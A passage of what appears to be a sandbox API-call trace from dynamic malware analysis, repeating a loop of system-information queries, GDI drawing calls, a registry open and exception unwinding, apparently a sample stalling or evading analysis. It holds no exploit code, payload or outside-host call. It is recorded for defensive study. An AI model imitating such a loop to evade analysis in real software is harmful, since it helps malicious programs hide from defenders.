(in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.253] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.253] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.253] BeginPath (hdc=0x0) returned 0 [0089.253] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.253] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.253] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.253] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.253] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.253] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401dc [0089.253] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401d9 [0089.253] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b8 [0089.253] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455b9 [0089.253] CombineRgn (hrgnDst=0x10455b8, hrgnSrc1=0x610401dc, hrgnSrc2=0x630401d9, iMode=1) returned 1 [0089.253] CombineRgn (hrgnDst=0x10455b9, hrgnSrc1=0x610401dc, hrgnSrc2=0x630401d9, iMode=4) returned 2 [0089.253] CreateSolidBrush (color=0xff) returned 0x21055b7 [0089.253] CreateSolidBrush (color=0xff0000) returned 0x11055ba [0089.253] DeleteObject (ho=0x11055ba) returned 1 [0089.253] DeleteObject (ho=0x630401d9) returned 1 [0089.253] DeleteObject (ho=0x610401dc) returned 1 [0089.253] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.253] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.253] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.253] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.253] BeginPath (hdc=0x0) returned 0 [0089.253] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.253] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.253] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.253] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.253] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.253] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.253] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.254] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401d9 [0089.254] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401dc [0089.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455bb [0089.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455bc [0089.254] CombineRgn (hrgnDst=0x10455bb, hrgnSrc1=0x640401d9, hrgnSrc2=0x620401dc, iMode=1) returned 1 [0089.254] CombineRgn (hrgnDst=0x10455bc, hrgnSrc1=0x640401d9, hrgnSrc2=0x620401dc, iMode=4) returned 2 [0089.254] CreateSolidBrush (color=0xff) returned 0x21055ba [0089.254] CreateSolidBrush (color=0xff0000) returned 0x11055bd [0089.254] DeleteObject (ho=0x11055bd) returned 1 [0089.254] DeleteObject (ho=0x620401dc) returned 1 [0089.254] DeleteObject (ho=0x640401d9) returned 1 [0089.254] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.254] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.254] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.254] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.254] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.254] BeginPath (hdc=0x0) returned 0 [0089.254] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.254] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.254] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.254] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.254] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.254] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.254] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.254] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401dc [0089.254] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401d9 [0089.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455be [0089.254] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455bf [0089.254] CombineRgn (hrgnDst=0x10455be, hrgnSrc1=0x630401dc, hrgnSrc2=0x650401d9, iMode=1) returned 1 [0089.254] CombineRgn (hrgnDst=0x10455bf, hrgnSrc1=0x630401dc, hrgnSrc2=0x650401d9, iMode=4) returned 2 [0089.254] CreateSolidBrush (color=0xff) returned 0x21055bd [0089.254] CreateSolidBrush (color=0xff0000) returned 0x11055c0 [0089.254] DeleteObject (ho=0x11055c0) returned 1 [0089.254] DeleteObject (ho=0x650401d9) returned 1 [0089.254] DeleteObject (ho=0x630401dc) returned 1 [0089.254] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.254] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.255] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.255] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.255] BeginPath (hdc=0x0) returned 0 [0089.255] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.255] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.255] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.255] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.255] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401d9 [0089.255] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401dc [0089.255] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c1 [0089.255] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c2 [0089.255] CombineRgn (hrgnDst=0x10455c1, hrgnSrc1=0x660401d9, hrgnSrc2=0x640401dc, iMode=1) returned 1 [0089.255] CombineRgn (hrgnDst=0x10455c2, hrgnSrc1=0x660401d9, hrgnSrc2=0x640401dc, iMode=4) returned 2 [0089.255] CreateSolidBrush (color=0xff) returned 0x21055c0 [0089.255] CreateSolidBrush (color=0xff0000) returned 0x11055c3 [0089.255] DeleteObject (ho=0x11055c3) returned 1 [0089.255] DeleteObject (ho=0x640401dc) returned 1 [0089.255] DeleteObject (ho=0x660401d9) returned 1 [0089.255] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.255] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.255] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.255] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.255] BeginPath (hdc=0x0) returned 0 [0089.255] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.255] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.255] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.255] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.255] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.255] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.255] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.256] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401dc [0089.256] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401d9 [0089.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c4 [0089.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c5 [0089.256] CombineRgn (hrgnDst=0x10455c4, hrgnSrc1=0x650401dc, hrgnSrc2=0x670401d9, iMode=1) returned 1 [0089.256] CombineRgn (hrgnDst=0x10455c5, hrgnSrc1=0x650401dc, hrgnSrc2=0x670401d9, iMode=4) returned 2 [0089.256] CreateSolidBrush (color=0xff) returned 0x21055c3 [0089.256] CreateSolidBrush (color=0xff0000) returned 0x11055c6 [0089.256] DeleteObject (ho=0x11055c6) returned 1 [0089.256] DeleteObject (ho=0x670401d9) returned 1 [0089.256] DeleteObject (ho=0x650401dc) returned 1 [0089.256] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.256] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.256] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.256] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.256] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.256] BeginPath (hdc=0x0) returned 0 [0089.256] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.256] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.256] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.256] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.256] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.256] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.256] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.256] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.256] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401d9 [0089.256] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401dc [0089.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c7 [0089.256] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455c8 [0089.256] CombineRgn (hrgnDst=0x10455c7, hrgnSrc1=0x680401d9, hrgnSrc2=0x660401dc, iMode=1) returned 1 [0089.256] CombineRgn (hrgnDst=0x10455c8, hrgnSrc1=0x680401d9, hrgnSrc2=0x660401dc, iMode=4) returned 2 [0089.256] CreateSolidBrush (color=0xff) returned 0x21055c6 [0089.256] CreateSolidBrush (color=0xff0000) returned 0x11055c9 [0089.256] DeleteObject (ho=0x11055c9) returned 1 [0089.256] DeleteObject (ho=0x660401dc) returned 1 [0089.256] DeleteObject (ho=0x680401d9) returned 1 [0089.256] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.256] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.257] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.257] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.257] BeginPath (hdc=0x0) returned 0 [0089.257] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.257] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.257] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.257] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.257] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.257] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401dc [0089.257] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401d9 [0089.257] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ca [0089.257] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455cb [0089.257] CombineRgn (hrgnDst=0x10455ca, hrgnSrc1=0x670401dc, hrgnSrc2=0x690401d9, iMode=1) returned 1 [0089.257] CombineRgn (hrgnDst=0x10455cb, hrgnSrc1=0x670401dc, hrgnSrc2=0x690401d9, iMode=4) returned 2 [0089.257] CreateSolidBrush (color=0xff) returned 0x21055c9 [0089.257] CreateSolidBrush (color=0xff0000) returned 0x11055cc [0089.257] DeleteObject (ho=0x11055cc) returned 1 [0089.257] DeleteObject (ho=0x690401d9) returned 1 [0089.257] DeleteObject (ho=0x670401dc) returned 1 [0089.257] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.257] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.257] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.257] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.257] BeginPath (hdc=0x0) returned 0 [0089.257] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.257] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.257] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.257] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.257] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.257] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.257] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.258] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401d9 [0089.258] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401dc [0089.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455cd [0089.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455ce [0089.258] CombineRgn (hrgnDst=0x10455cd, hrgnSrc1=0x6a0401d9, hrgnSrc2=0x680401dc, iMode=1) returned 1 [0089.258] CombineRgn (hrgnDst=0x10455ce, hrgnSrc1=0x6a0401d9, hrgnSrc2=0x680401dc, iMode=4) returned 2 [0089.258] CreateSolidBrush (color=0xff) returned 0x21055cc [0089.258] CreateSolidBrush (color=0xff0000) returned 0x11055cf [0089.258] DeleteObject (ho=0x11055cf) returned 1 [0089.258] DeleteObject (ho=0x680401dc) returned 1 [0089.258] DeleteObject (ho=0x6a0401d9) returned 1 [0089.258] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.258] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.258] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.258] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.258] BeginPath (hdc=0x0) returned 0 [0089.258] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.258] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.258] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.258] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.258] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.258] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401dc [0089.258] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401d9 [0089.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d0 [0089.258] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10455d1 [0089.258] CombineRgn (hrgnDst=0x10455d0, hrgnSrc1=0x690401dc, hrgnSrc2=0x6b0401d9, iMode=1) returned 1 [0089.258] CombineRgn (hrgnDst=0x10455d1, hrgnSrc1=0x690401dc, hrgnSrc2=0x6b0401d9, iMode=4) returned 2 [0089.258] CreateSolidBrush (color=0xff) returned 0x21055cf [0089.258] CreateSolidBrush (color=0xff0000) returned 0x11055d2 [0089.258] DeleteObject (ho=0x11055d2) returned 1 [0089.258] DeleteObject (ho=0x6b0401d9) returned 1 [0089.258] DeleteObject (ho=0x690401dc) returned 1 [0089.258] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.258] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.258] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.259] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.259] BeginPath (hdc=0x0) returned 0 [0089.259] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.259] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.259] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.259] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.259] GetWindowRect (in: 